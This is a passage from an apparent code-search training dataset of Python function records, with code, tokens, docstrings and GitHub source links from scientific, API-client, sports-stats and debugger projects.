Public function that removes temporary tar archive files in a local directory
[ "Public", "function", "that", "removes", "temporary", "tar", "archive", "files", "in", "a", "local", "directory" ]
python
train
thunder-project/thunder
thunder/blocks/blocks.py
https://github.com/thunder-project/thunder/blob/967ff8f3e7c2fabe1705743d95eb2746d4329786/thunder/blocks/blocks.py#L89-L102
def toseries(self): """ Converts blocks to series. """ from thunder.series.series import Series if self.mode == 'spark': values = self.values.values_to_keys(tuple(range(1, len(self.shape)))).unchunk() if self.mode == 'local': values = self.values.unchunk() values = rollaxis(values, 0, values.ndim) return Series(values)
[ "def", "toseries", "(", "self", ")", ":", "from", "thunder", ".", "series", ".", "series", "import", "Series", "if", "self", ".", "mode", "==", "'spark'", ":", "values", "=", "self", ".", "values", ".", "values_to_keys", "(", "tuple", "(", "range", "(", "1", ",", "len", "(", "self", ".", "shape", ")", ")", ")", ")", ".", "unchunk", "(", ")", "if", "self", ".", "mode", "==", "'local'", ":", "values", "=", "self", ".", "values", ".", "unchunk", "(", ")", "values", "=", "rollaxis", "(", "values", ",", "0", ",", "values", ".", "ndim", ")", "return", "Series", "(", "values", ")" ]
Converts blocks to series.
[ "Converts", "blocks", "to", "series", "." ]
python
train
bcbio/bcbio-nextgen
bcbio/ngsalign/alignprep.py
https://github.com/bcbio/bcbio-nextgen/blob/6a9348c0054ccd5baffd22f1bb7d0422f6978b20/bcbio/ngsalign/alignprep.py#L64-L101
def _set_align_split_size(data): """Set useful align_split_size, generating an estimate if it doesn't exist. We try to split on larger inputs and avoid too many pieces, aiming for size chunks of 5Gb or at most 50 maximum splits. The size estimate used in calculations is 20 million reads for ~5Gb. For UMI calculations we skip splitting since we're going to align and re-align after consensus. For CWL runs, we pick larger split sizes to avoid overhead of staging each chunk. """ if cwlutils.is_cwl_run(data): target_size = 20 # Gb target_size_reads = 80 # million reads else: target_size = 5 # Gb target_size_reads = 20 # million reads max_splits = 100 # Avoid too many pieces, causing merge memory problems val = dd.get_align_split_size(data) umi_consensus = dd.get_umi_consensus(data) if val is None: if not umi_consensus: total_size = 0 # Gb # Use original files if we might have reduced the size of our prepped files input_files = data.get("files_orig", []) if dd.get_save_diskspace(data) else data.get("files", []) for fname in input_files: if os.path.exists(fname): total_size += os.path.getsize(fname) / (1024.0 * 1024.0 * 1024.0) # Only set if we have files and are bigger than the target size if total_size > target_size: data["config"]["algorithm"]["align_split_size"] = \ int(1e6 * _pick_align_split_size(total_size, target_size, target_size_reads, max_splits)) elif val: assert not umi_consensus, "Cannot set align_split_size to %s with UMI conensus specified" % val return data
[ "def", "_set_align_split_size", "(", "data", ")", ":", "if", "cwlutils", ".", "is_cwl_run", "(", "data", ")", ":", "target_size", "=", "20", "# Gb", "target_size_reads", "=", "80", "# million reads", "else", ":", "target_size", "=", "5", "# Gb", "target_size_reads", "=", "20", "# million reads", "max_splits", "=", "100", "# Avoid too many pieces, causing merge memory problems", "val", "=", "dd", ".", "get_align_split_size", "(", "data", ")", "umi_consensus", "=", "dd", ".", "get_umi_consensus", "(", "data", ")", "if", "val", "is", "None", ":", "if", "not", "umi_consensus", ":", "total_size", "=", "0", "# Gb", "# Use original files if we might have reduced the size of our prepped files", "input_files", "=", "data", ".", "get", "(", "\"files_orig\"", ",", "[", "]", ")", "if", "dd", ".", "get_save_diskspace", "(", "data", ")", "else", "data", ".", "get", "(", "\"files\"", ",", "[", "]", ")", "for", "fname", "in", "input_files", ":", "if", "os", ".", "path", ".", "exists", "(", "fname", ")", ":", "total_size", "+=", "os", ".", "path", ".", "getsize", "(", "fname", ")", "/", "(", "1024.0", "*", "1024.0", "*", "1024.0", ")", "# Only set if we have files and are bigger than the target size", "if", "total_size", ">", "target_size", ":", "data", "[", "\"config\"", "]", "[", "\"algorithm\"", "]", "[", "\"align_split_size\"", "]", "=", "int", "(", "1e6", "*", "_pick_align_split_size", "(", "total_size", ",", "target_size", ",", "target_size_reads", ",", "max_splits", ")", ")", "elif", "val", ":", "assert", "not", "umi_consensus", ",", "\"Cannot set align_split_size to %s with UMI conensus specified\"", "%", "val", "return", "data" ]
Set useful align_split_size, generating an estimate if it doesn't exist. We try to split on larger inputs and avoid too many pieces, aiming for size chunks of 5Gb or at most 50 maximum splits. The size estimate used in calculations is 20 million reads for ~5Gb. For UMI calculations we skip splitting since we're going to align and re-align after consensus. For CWL runs, we pick larger split sizes to avoid overhead of staging each chunk.
[ "Set", "useful", "align_split_size", "generating", "an", "estimate", "if", "it", "doesn", "t", "exist", "." ]
python
train
KarchinLab/probabilistic2020
prob2020/python/permutation.py
https://github.com/KarchinLab/probabilistic2020/blob/5d70583b0a7c07cfe32e95f3a70e05df412acb84/prob2020/python/permutation.py#L210-L357
def hotmaps_permutation(obs_stat, context_counts, context_to_mut, seq_context, gene_seq, window, num_permutations=10000, stop_criteria=100, max_batch=25000, null_save_path=None): """Performs null-permutations for position-based mutation statistics in a single gene. Parameters ---------- obs_stat : dict dictionary mapping codons to the sum of mutations in a window context_counts : pd.Series number of mutations for each context context_to_mut : dict dictionary mapping nucleotide context to a list of observed somatic base changes. seq_context : SequenceContext Sequence context for the entire gene sequence (regardless of where mutations occur). The nucleotide contexts are identified at positions along the gene. gene_seq : GeneSequence Sequence of gene of interest window : int Number of codons to the left/right of a mutated position to consider in the window num_permutations : int, default: 10000 number of permutations to create for null stop_criteria : int stop after stop_criteria iterations are more significant then the observed statistic. max_batch : int maximum number of whole gene simulations to do at once. For large number of simulations holding a matrix of M x N, where M is the number of mutations and N is the number of simulations, can get quite large. null_save_path : str or None File path to save null distribution. If None, don't save it. Returns ------- pvals : dict Maps mutated codon position to the calculated p-value """ # get contexts and somatic base mycontexts = context_counts.index.tolist() somatic_base = [base for one_context in mycontexts for base in context_to_mut[one_context]] # calculate the # of batches for simulations max_batch = min(num_permutations, max_batch) num_batches = num_permutations // max_batch remainder = num_permutations % max_batch batch_sizes = [max_batch] * num_batches if remainder: batch_sizes += [remainder] # figure out which position has highest value max_key = {w: max(obs_stat[w], key=(lambda key: obs_stat[w][key])) for w in window} # setup null dist counts null_cts = {w: {k: 0 for k in obs_stat[w]} for w in window } # empirical null distribution (saved if file path provided) empirical_null = {w: {} for w in window} num_sim = 0 # number of simulations for j, batch_size in enumerate(batch_sizes): # stop iterations if reached sufficient precision # stop iterations if reached sufficient precision stop_flag = [(null_cts[w][max_key[w]]>=stop_criteria) for w in window] if all(stop_flag): break #if null_cts[max_key] >= stop_criteria: #break # get random positions determined by sequence context tmp_contxt_pos = seq_context.random_pos(context_counts.iteritems(), batch_size) tmp_mut_pos = np.hstack(pos_array for base, pos_array in tmp_contxt_pos) # calculate position-based statistics as a result of random positions for i, row in enumerate(tmp_mut_pos): # get info about mutations tmp_mut_info = mc.get_aa_mut_info(row, somatic_base, gene_seq) # calculate position info tmp_pos, tmp_sim = utils.calc_windowed_sum(tmp_mut_info['Codon Pos'], tmp_mut_info['Reference AA'], tmp_mut_info['Somatic AA'], window) # update the counts when the empirical null passes the observed for tmp_w in tmp_sim: for tmp_key in tmp_sim[tmp_w]: # get mutation count for simulation val = tmp_sim[tmp_w][tmp_key] # add to empirical null distribution empirical_null[tmp_w].setdefault(val, 0) empirical_null[tmp_w][val] += 1 # update counts used for p-value for key in null_cts[tmp_w]: if val >= obs_stat[tmp_w][key]: null_cts[tmp_w][key] += 1 # update the number of simulations num_sim += len(tmp_pos) # stop iterations if reached sufficient precision stop_flag = [(null_cts[w][max_key[w]]>=stop_criteria) for w in window] if all(stop_flag): break # calculate p-value from empirical null-distribution pvals = {w: {k: float(null_cts[w][k]) / (num_sim) for k in obs_stat[w]} for w in window} # save empirical distribution if null_save_path: for w in window: # create null distribution output = [['mutation_count', 'p-value']] sorted_cts = sorted(empirical_null[w].keys()) tmp_sum = 0 for i in range(len(sorted_cts)): tmp_sum += empirical_null[w][sorted_cts[-(i+1)]] tmp_pval = tmp_sum / float(num_sim) output.append([sorted_cts[-(i+1)], tmp_pval]) # save output with open(null_save_path.format(w), 'w') as handle: mywriter = csv.writer(handle, delimiter='\t', lineterminator='\n') mywriter.writerows(output) return pvals
[ "def", "hotmaps_permutation", "(", "obs_stat", ",", "context_counts", ",", "context_to_mut", ",", "seq_context", ",", "gene_seq", ",", "window", ",", "num_permutations", "=", "10000", ",", "stop_criteria", "=", "100", ",", "max_batch", "=", "25000", ",", "null_save_path", "=", "None", ")", ":", "# get contexts and somatic base", "mycontexts", "=", "context_counts", ".", "index", ".", "tolist", "(", ")", "somatic_base", "=", "[", "base", "for", "one_context", "in", "mycontexts", "for", "base", "in", "context_to_mut", "[", "one_context", "]", "]", "# calculate the # of batches for simulations", "max_batch", "=", "min", "(", "num_permutations", ",", "max_batch", ")", "num_batches", "=", "num_permutations", "//", "max_batch", "remainder", "=", "num_permutations", "%", "max_batch", "batch_sizes", "=", "[", "max_batch", "]", "*", "num_batches", "if", "remainder", ":", "batch_sizes", "+=", "[", "remainder", "]", "# figure out which position has highest value", "max_key", "=", "{", "w", ":", "max", "(", "obs_stat", "[", "w", "]", ",", "key", "=", "(", "lambda", "key", ":", "obs_stat", "[", "w", "]", "[", "key", "]", ")", ")", "for", "w", "in", "window", "}", "# setup null dist counts", "null_cts", "=", "{", "w", ":", "{", "k", ":", "0", "for", "k", "in", "obs_stat", "[", "w", "]", "}", "for", "w", "in", "window", "}", "# empirical null distribution (saved if file path provided)", "empirical_null", "=", "{", "w", ":", "{", "}", "for", "w", "in", "window", "}", "num_sim", "=", "0", "# number of simulations", "for", "j", ",", "batch_size", "in", "enumerate", "(", "batch_sizes", ")", ":", "# stop iterations if reached sufficient precision", "# stop iterations if reached sufficient precision", "stop_flag", "=", "[", "(", "null_cts", "[", "w", "]", "[", "max_key", "[", "w", "]", "]", ">=", "stop_criteria", ")", "for", "w", "in", "window", "]", "if", "all", "(", "stop_flag", ")", ":", "break", "#if null_cts[max_key] >= stop_criteria:", "#break", "# get random positions determined by sequence context", "tmp_contxt_pos", "=", "seq_context", ".", "random_pos", "(", "context_counts", ".", "iteritems", "(", ")", ",", "batch_size", ")", "tmp_mut_pos", "=", "np", ".", "hstack", "(", "pos_array", "for", "base", ",", "pos_array", "in", "tmp_contxt_pos", ")", "# calculate position-based statistics as a result of random positions", "for", "i", ",", "row", "in", "enumerate", "(", "tmp_mut_pos", ")", ":", "# get info about mutations", "tmp_mut_info", "=", "mc", ".", "get_aa_mut_info", "(", "row", ",", "somatic_base", ",", "gene_seq", ")", "# calculate position info", "tmp_pos", ",", "tmp_sim", "=", "utils", ".", "calc_windowed_sum", "(", "tmp_mut_info", "[", "'Codon Pos'", "]", ",", "tmp_mut_info", "[", "'Reference AA'", "]", ",", "tmp_mut_info", "[", "'Somatic AA'", "]", ",", "window", ")", "# update the counts when the empirical null passes the observed", "for", "tmp_w", "in", "tmp_sim", ":", "for", "tmp_key", "in", "tmp_sim", "[", "tmp_w", "]", ":", "# get mutation count for simulation", "val", "=", "tmp_sim", "[", "tmp_w", "]", "[", "tmp_key", "]", "# add to empirical null distribution", "empirical_null", "[", "tmp_w", "]", ".", "setdefault", "(", "val", ",", "0", ")", "empirical_null", "[", "tmp_w", "]", "[", "val", "]", "+=", "1", "# update counts used for p-value", "for", "key", "in", "null_cts", "[", "tmp_w", "]", ":", "if", "val", ">=", "obs_stat", "[", "tmp_w", "]", "[", "key", "]", ":", "null_cts", "[", "tmp_w", "]", "[", "key", "]", "+=", "1", "# update the number of simulations", "num_sim", "+=", "len", "(", "tmp_pos", ")", "# stop iterations if reached sufficient precision", "stop_flag", "=", "[", "(", "null_cts", "[", "w", "]", "[", "max_key", "[", "w", "]", "]", ">=", "stop_criteria", ")", "for", "w", "in", "window", "]", "if", "all", "(", "stop_flag", ")", ":", "break", "# calculate p-value from empirical null-distribution", "pvals", "=", "{", "w", ":", "{", "k", ":", "float", "(", "null_cts", "[", "w", "]", "[", "k", "]", ")", "/", "(", "num_sim", ")", "for", "k", "in", "obs_stat", "[", "w", "]", "}", "for", "w", "in", "window", "}", "# save empirical distribution", "if", "null_save_path", ":", "for", "w", "in", "window", ":", "# create null distribution", "output", "=", "[", "[", "'mutation_count'", ",", "'p-value'", "]", "]", "sorted_cts", "=", "sorted", "(", "empirical_null", "[", "w", "]", ".", "keys", "(", ")", ")", "tmp_sum", "=", "0", "for", "i", "in", "range", "(", "len", "(", "sorted_cts", ")", ")", ":", "tmp_sum", "+=", "empirical_null", "[", "w", "]", "[", "sorted_cts", "[", "-", "(", "i", "+", "1", ")", "]", "]", "tmp_pval", "=", "tmp_sum", "/", "float", "(", "num_sim", ")", "output", ".", "append", "(", "[", "sorted_cts", "[", "-", "(", "i", "+", "1", ")", "]", ",", "tmp_pval", "]", ")", "# save output", "with", "open", "(", "null_save_path", ".", "format", "(", "w", ")", ",", "'w'", ")", "as", "handle", ":", "mywriter", "=", "csv", ".", "writer", "(", "handle", ",", "delimiter", "=", "'\\t'", ",", "lineterminator", "=", "'\\n'", ")", "mywriter", ".", "writerows", "(", "output", ")", "return", "pvals" ]
Performs null-permutations for position-based mutation statistics in a single gene. Parameters ---------- obs_stat : dict dictionary mapping codons to the sum of mutations in a window context_counts : pd.Series number of mutations for each context context_to_mut : dict dictionary mapping nucleotide context to a list of observed somatic base changes. seq_context : SequenceContext Sequence context for the entire gene sequence (regardless of where mutations occur). The nucleotide contexts are identified at positions along the gene. gene_seq : GeneSequence Sequence of gene of interest window : int Number of codons to the left/right of a mutated position to consider in the window num_permutations : int, default: 10000 number of permutations to create for null stop_criteria : int stop after stop_criteria iterations are more significant then the observed statistic. max_batch : int maximum number of whole gene simulations to do at once. For large number of simulations holding a matrix of M x N, where M is the number of mutations and N is the number of simulations, can get quite large. null_save_path : str or None File path to save null distribution. If None, don't save it. Returns ------- pvals : dict Maps mutated codon position to the calculated p-value
[ "Performs", "null", "-", "permutations", "for", "position", "-", "based", "mutation", "statistics", "in", "a", "single", "gene", "." ]
python
train
markovmodel/PyEMMA
pyemma/coordinates/data/util/traj_info_backends.py
https://github.com/markovmodel/PyEMMA/blob/5c3124398217de05ba5ce9c8fb01519222481ab8/pyemma/coordinates/data/util/traj_info_backends.py#L234-L257
def _database_from_key(self, key): """ gets the database name for the given key. Should ensure a uniform spread of keys over the databases in order to minimize waiting times. Since the database has to be locked for updates and multiple processes want to write, each process has to wait until the lock has been released. By default the LRU databases will be stored in a sub directory "traj_info_usage" lying next to the main database. :param key: hash of the TrajInfo instance :return: str, database path """ if not self.filename: return None from pyemma.util.files import mkdir_p hash_value_long = int(key, 16) # bin hash to one of either 10 different databases # TODO: make a configuration parameter out of this number db_name = str(hash_value_long)[-1] + '.db' directory = os.path.dirname(self.filename) + os.path.sep + 'traj_info_usage' mkdir_p(directory) return os.path.join(directory, db_name)
[ "def", "_database_from_key", "(", "self", ",", "key", ")", ":", "if", "not", "self", ".", "filename", ":", "return", "None", "from", "pyemma", ".", "util", ".", "files", "import", "mkdir_p", "hash_value_long", "=", "int", "(", "key", ",", "16", ")", "# bin hash to one of either 10 different databases", "# TODO: make a configuration parameter out of this number", "db_name", "=", "str", "(", "hash_value_long", ")", "[", "-", "1", "]", "+", "'.db'", "directory", "=", "os", ".", "path", ".", "dirname", "(", "self", ".", "filename", ")", "+", "os", ".", "path", ".", "sep", "+", "'traj_info_usage'", "mkdir_p", "(", "directory", ")", "return", "os", ".", "path", ".", "join", "(", "directory", ",", "db_name", ")" ]
gets the database name for the given key. Should ensure a uniform spread of keys over the databases in order to minimize waiting times. Since the database has to be locked for updates and multiple processes want to write, each process has to wait until the lock has been released. By default the LRU databases will be stored in a sub directory "traj_info_usage" lying next to the main database. :param key: hash of the TrajInfo instance :return: str, database path
[ "gets", "the", "database", "name", "for", "the", "given", "key", ".", "Should", "ensure", "a", "uniform", "spread", "of", "keys", "over", "the", "databases", "in", "order", "to", "minimize", "waiting", "times", ".", "Since", "the", "database", "has", "to", "be", "locked", "for", "updates", "and", "multiple", "processes", "want", "to", "write", "each", "process", "has", "to", "wait", "until", "the", "lock", "has", "been", "released", "." ]
python
train
jwodder/doapi
doapi/doapi.py
https://github.com/jwodder/doapi/blob/b1306de86a01d8ae7b9c1fe2699765bb82e4f310/doapi/doapi.py#L955-L1025
def _wait(self, objects, attr, value, wait_interval=None, wait_time=None): r""" Calls the ``fetch`` method of each object in ``objects`` periodically until the ``attr`` attribute of each one equals ``value``, yielding the final state of each object as soon as it satisfies the condition. If ``wait_time`` is exceeded, a `WaitTimeoutError` (containing any remaining in-progress objects) is raised. If a `KeyboardInterrupt` is caught, any remaining objects are returned immediately without waiting for completion. .. versionchanged:: 0.2.0 Raises `WaitTimeoutError` on timeout :param iterable objects: an iterable of `Resource`\ s with ``fetch`` methods :param string attr: the attribute to watch :param value: the value of ``attr`` to wait for :param number wait_interval: how many seconds to sleep between requests; defaults to :attr:`wait_interval` if not specified or `None` :param number wait_time: the total number of seconds after which the method will raise an error if any objects have not yet completed, or a negative number to wait indefinitely; defaults to :attr:`wait_time` if not specified or `None` :rtype: generator :raises DOAPIError: if the API endpoint replies with an error :raises WaitTimeoutError: if ``wait_time`` is exceeded """ objects = list(objects) if not objects: return if wait_interval is None: wait_interval = self.wait_interval if wait_time < 0: end_time = None else: if wait_time is None: wait_time = self.wait_time if wait_time is None or wait_time < 0: end_time = None else: end_time = time() + wait_time while end_time is None or time() < end_time: loop_start = time() next_objs = [] for o in objects: obj = o.fetch() if getattr(obj, attr, None) == value: yield obj else: next_objs.append(obj) objects = next_objs if not objects: break loop_end = time() time_left = wait_interval - (loop_end - loop_start) if end_time is not None: time_left = min(time_left, end_time - loop_end) if time_left > 0: try: sleep(time_left) except KeyboardInterrupt: for o in objects: yield o return if objects: raise WaitTimeoutError(objects, attr, value, wait_interval, wait_time)
[ "def", "_wait", "(", "self", ",", "objects", ",", "attr", ",", "value", ",", "wait_interval", "=", "None", ",", "wait_time", "=", "None", ")", ":", "objects", "=", "list", "(", "objects", ")", "if", "not", "objects", ":", "return", "if", "wait_interval", "is", "None", ":", "wait_interval", "=", "self", ".", "wait_interval", "if", "wait_time", "<", "0", ":", "end_time", "=", "None", "else", ":", "if", "wait_time", "is", "None", ":", "wait_time", "=", "self", ".", "wait_time", "if", "wait_time", "is", "None", "or", "wait_time", "<", "0", ":", "end_time", "=", "None", "else", ":", "end_time", "=", "time", "(", ")", "+", "wait_time", "while", "end_time", "is", "None", "or", "time", "(", ")", "<", "end_time", ":", "loop_start", "=", "time", "(", ")", "next_objs", "=", "[", "]", "for", "o", "in", "objects", ":", "obj", "=", "o", ".", "fetch", "(", ")", "if", "getattr", "(", "obj", ",", "attr", ",", "None", ")", "==", "value", ":", "yield", "obj", "else", ":", "next_objs", ".", "append", "(", "obj", ")", "objects", "=", "next_objs", "if", "not", "objects", ":", "break", "loop_end", "=", "time", "(", ")", "time_left", "=", "wait_interval", "-", "(", "loop_end", "-", "loop_start", ")", "if", "end_time", "is", "not", "None", ":", "time_left", "=", "min", "(", "time_left", ",", "end_time", "-", "loop_end", ")", "if", "time_left", ">", "0", ":", "try", ":", "sleep", "(", "time_left", ")", "except", "KeyboardInterrupt", ":", "for", "o", "in", "objects", ":", "yield", "o", "return", "if", "objects", ":", "raise", "WaitTimeoutError", "(", "objects", ",", "attr", ",", "value", ",", "wait_interval", ",", "wait_time", ")" ]
r""" Calls the ``fetch`` method of each object in ``objects`` periodically until the ``attr`` attribute of each one equals ``value``, yielding the final state of each object as soon as it satisfies the condition. If ``wait_time`` is exceeded, a `WaitTimeoutError` (containing any remaining in-progress objects) is raised. If a `KeyboardInterrupt` is caught, any remaining objects are returned immediately without waiting for completion. .. versionchanged:: 0.2.0 Raises `WaitTimeoutError` on timeout :param iterable objects: an iterable of `Resource`\ s with ``fetch`` methods :param string attr: the attribute to watch :param value: the value of ``attr`` to wait for :param number wait_interval: how many seconds to sleep between requests; defaults to :attr:`wait_interval` if not specified or `None` :param number wait_time: the total number of seconds after which the method will raise an error if any objects have not yet completed, or a negative number to wait indefinitely; defaults to :attr:`wait_time` if not specified or `None` :rtype: generator :raises DOAPIError: if the API endpoint replies with an error :raises WaitTimeoutError: if ``wait_time`` is exceeded
[ "r", "Calls", "the", "fetch", "method", "of", "each", "object", "in", "objects", "periodically", "until", "the", "attr", "attribute", "of", "each", "one", "equals", "value", "yielding", "the", "final", "state", "of", "each", "object", "as", "soon", "as", "it", "satisfies", "the", "condition", "." ]
python
train
borntyping/python-riemann-client
riemann_client/command.py
https://github.com/borntyping/python-riemann-client/blob/3e181d90bdf685afd21c1ec5ee20e6840b011ea5/riemann_client/command.py#L57-L81
def main(ctx, host, port, transport_type, timeout, ca_certs): """Connects to a Riemann server to send events or query the index By default, will attempt to contact Riemann on localhost:5555 over TCP. The RIEMANN_HOST and RIEMANN_PORT environment variables can be used to configure the host and port used. Command line parameters will override the environment variables. Use `-T none` to test commands without actually connecting to a server. """ if transport_type == 'udp': if timeout is not None: ctx.fail('--timeout cannot be used with the UDP transport') transport = riemann_client.transport.UDPTransport(host, port) elif transport_type == 'tcp': transport = riemann_client.transport.TCPTransport(host, port, timeout) elif transport_type == 'tls': if ca_certs is None: ctx.fail('--ca-certs must be set when using the TLS transport') transport = riemann_client.transport.TLSTransport( host, port, timeout, ca_certs) elif transport_type == 'none': transport = riemann_client.transport.BlankTransport() ctx.obj = transport
[ "def", "main", "(", "ctx", ",", "host", ",", "port", ",", "transport_type", ",", "timeout", ",", "ca_certs", ")", ":", "if", "transport_type", "==", "'udp'", ":", "if", "timeout", "is", "not", "None", ":", "ctx", ".", "fail", "(", "'--timeout cannot be used with the UDP transport'", ")", "transport", "=", "riemann_client", ".", "transport", ".", "UDPTransport", "(", "host", ",", "port", ")", "elif", "transport_type", "==", "'tcp'", ":", "transport", "=", "riemann_client", ".", "transport", ".", "TCPTransport", "(", "host", ",", "port", ",", "timeout", ")", "elif", "transport_type", "==", "'tls'", ":", "if", "ca_certs", "is", "None", ":", "ctx", ".", "fail", "(", "'--ca-certs must be set when using the TLS transport'", ")", "transport", "=", "riemann_client", ".", "transport", ".", "TLSTransport", "(", "host", ",", "port", ",", "timeout", ",", "ca_certs", ")", "elif", "transport_type", "==", "'none'", ":", "transport", "=", "riemann_client", ".", "transport", ".", "BlankTransport", "(", ")", "ctx", ".", "obj", "=", "transport" ]
Connects to a Riemann server to send events or query the index By default, will attempt to contact Riemann on localhost:5555 over TCP. The RIEMANN_HOST and RIEMANN_PORT environment variables can be used to configure the host and port used. Command line parameters will override the environment variables. Use `-T none` to test commands without actually connecting to a server.
[ "Connects", "to", "a", "Riemann", "server", "to", "send", "events", "or", "query", "the", "index" ]
python
train
ktdreyer/txkoji
txkoji/connection.py
https://github.com/ktdreyer/txkoji/blob/a7de380f29f745bf11730b27217208f6d4da7733/txkoji/connection.py#L393-L406
def listChannels(self, **kwargs): """ Get information about all Koji channels. :param **kwargs: keyword args to pass through to listChannels RPC. :returns: deferred that when fired returns a list of Channel objects. """ data = yield self.call('listChannels', **kwargs) channels = [] for cdata in data: channel = Channel.fromDict(cdata) channel.connection = self channels.append(channel) defer.returnValue(channels)
[ "def", "listChannels", "(", "self", ",", "*", "*", "kwargs", ")", ":", "data", "=", "yield", "self", ".", "call", "(", "'listChannels'", ",", "*", "*", "kwargs", ")", "channels", "=", "[", "]", "for", "cdata", "in", "data", ":", "channel", "=", "Channel", ".", "fromDict", "(", "cdata", ")", "channel", ".", "connection", "=", "self", "channels", ".", "append", "(", "channel", ")", "defer", ".", "returnValue", "(", "channels", ")" ]
Get information about all Koji channels. :param **kwargs: keyword args to pass through to listChannels RPC. :returns: deferred that when fired returns a list of Channel objects.
[ "Get", "information", "about", "all", "Koji", "channels", "." ]
python
train
marcocamma/datastorage
datastorage/datastorage.py
https://github.com/marcocamma/datastorage/blob/d88cdc08414c1c99d34d62e65fcbf807c3088a37/datastorage/datastorage.py#L233-L254
def save(fname, d, link_copy=True,raiseError=False): """ link_copy is used by hdf5 saving only, it allows to creat link of identical arrays (saving space) """ # make sure the object is dict (recursively) this allows reading it # without the DataStorage module fname = pathlib.Path(fname) d = toDict(d, recursive=True) d['filename'] = str(fname) extension = fname.suffix log.info("Saving storage file %s" % fname) try: if extension == ".npz": return dictToNpz(fname, d) elif extension == ".h5": return dictToH5(fname, d, link_copy=link_copy) elif extension == ".npy": return dictToNpy(fname, d) else: raise ValueError( "Extension must be h5, npy or npz, it was %s" % extension) except Exception as e: log.exception("Could not save %s" % fname) if raiseError: raise e
[ "def", "save", "(", "fname", ",", "d", ",", "link_copy", "=", "True", ",", "raiseError", "=", "False", ")", ":", "# make sure the object is dict (recursively) this allows reading it", "# without the DataStorage module", "fname", "=", "pathlib", ".", "Path", "(", "fname", ")", "d", "=", "toDict", "(", "d", ",", "recursive", "=", "True", ")", "d", "[", "'filename'", "]", "=", "str", "(", "fname", ")", "extension", "=", "fname", ".", "suffix", "log", ".", "info", "(", "\"Saving storage file %s\"", "%", "fname", ")", "try", ":", "if", "extension", "==", "\".npz\"", ":", "return", "dictToNpz", "(", "fname", ",", "d", ")", "elif", "extension", "==", "\".h5\"", ":", "return", "dictToH5", "(", "fname", ",", "d", ",", "link_copy", "=", "link_copy", ")", "elif", "extension", "==", "\".npy\"", ":", "return", "dictToNpy", "(", "fname", ",", "d", ")", "else", ":", "raise", "ValueError", "(", "\"Extension must be h5, npy or npz, it was %s\"", "%", "extension", ")", "except", "Exception", "as", "e", ":", "log", ".", "exception", "(", "\"Could not save %s\"", "%", "fname", ")", "if", "raiseError", ":", "raise", "e" ]
link_copy is used by hdf5 saving only, it allows to creat link of identical arrays (saving space)
[ "link_copy", "is", "used", "by", "hdf5", "saving", "only", "it", "allows", "to", "creat", "link", "of", "identical", "arrays", "(", "saving", "space", ")" ]
python
train
roclark/sportsreference
sportsreference/nba/roster.py
https://github.com/roclark/sportsreference/blob/ea0bae432be76450e137671d2998eb38f962dffd/sportsreference/nba/roster.py#L442-L468
def _parse_contract(self, player_info): """ Parse the player's contract. Depending on the player's contract status, a contract table is located at the bottom of the stats page and includes player wages by season. If found, create a dictionary housing the wages by season. Parameters ---------- player_info : PyQuery object A PyQuery object containing the HTML from the player's stats page. """ tables = player_info('table').items() for table in tables: id_attr = table.attr('id') if id_attr: if id_attr.startswith('contracts_'): years = self._parse_contract_headers(table) wages = self._parse_contract_wages(table) contract = self._combine_contract(years, wages) # If the contract is empty, the player likely doesn't have # a contract and should have a value of None instead. if contract == {}: contract = None setattr(self, '_contract', contract) break
[ "def", "_parse_contract", "(", "self", ",", "player_info", ")", ":", "tables", "=", "player_info", "(", "'table'", ")", ".", "items", "(", ")", "for", "table", "in", "tables", ":", "id_attr", "=", "table", ".", "attr", "(", "'id'", ")", "if", "id_attr", ":", "if", "id_attr", ".", "startswith", "(", "'contracts_'", ")", ":", "years", "=", "self", ".", "_parse_contract_headers", "(", "table", ")", "wages", "=", "self", ".", "_parse_contract_wages", "(", "table", ")", "contract", "=", "self", ".", "_combine_contract", "(", "years", ",", "wages", ")", "# If the contract is empty, the player likely doesn't have", "# a contract and should have a value of None instead.", "if", "contract", "==", "{", "}", ":", "contract", "=", "None", "setattr", "(", "self", ",", "'_contract'", ",", "contract", ")", "break" ]
Parse the player's contract. Depending on the player's contract status, a contract table is located at the bottom of the stats page and includes player wages by season. If found, create a dictionary housing the wages by season. Parameters ---------- player_info : PyQuery object A PyQuery object containing the HTML from the player's stats page.
[ "Parse", "the", "player", "s", "contract", "." ]
python
train
fabioz/PyDev.Debugger
pydevd.py
https://github.com/fabioz/PyDev.Debugger/blob/ed9c4307662a5593b8a7f1f3389ecd0e79b8c503/pydevd.py#L1172-L1231
def set_suspend(self, thread, stop_reason, suspend_other_threads=False, is_pause=False): ''' :param thread: The thread which should be suspended. :param stop_reason: Reason why the thread was suspended. :param suspend_other_threads: Whether to force other threads to be suspended (i.e.: when hitting a breakpoint with a suspend all threads policy). :param is_pause: If this is a pause to suspend all threads, any thread can be considered as the 'main' thread paused. ''' self._threads_suspended_single_notification.increment_suspend_time() if is_pause: self._threads_suspended_single_notification.on_pause() info = self._mark_suspend(thread, stop_reason) if is_pause: # Must set tracing after setting the state to suspend. frame = info.get_topmost_frame(thread) if frame is not None: try: self.set_trace_for_frame_and_parents(frame) finally: frame = None # If conditional breakpoint raises any exception during evaluation send the details to the client. if stop_reason == CMD_SET_BREAK and info.conditional_breakpoint_exception is not None: conditional_breakpoint_exception_tuple = info.conditional_breakpoint_exception info.conditional_breakpoint_exception = None self._send_breakpoint_condition_exception(thread, conditional_breakpoint_exception_tuple) if not suspend_other_threads and self.multi_threads_single_notification: # In the mode which gives a single notification when all threads are # stopped, stop all threads whenever a set_suspend is issued. suspend_other_threads = True if suspend_other_threads: # Suspend all other threads. all_threads = pydevd_utils.get_non_pydevd_threads() for t in all_threads: if getattr(t, 'pydev_do_not_trace', None): pass # skip some other threads, i.e. ipython history saving thread from debug console else: if t is thread: continue info = self._mark_suspend(t, CMD_THREAD_SUSPEND) frame = info.get_topmost_frame(t) # Reset the time as in this case this was not the main thread suspended. if frame is not None: try: self.set_trace_for_frame_and_parents(frame) finally: frame = None
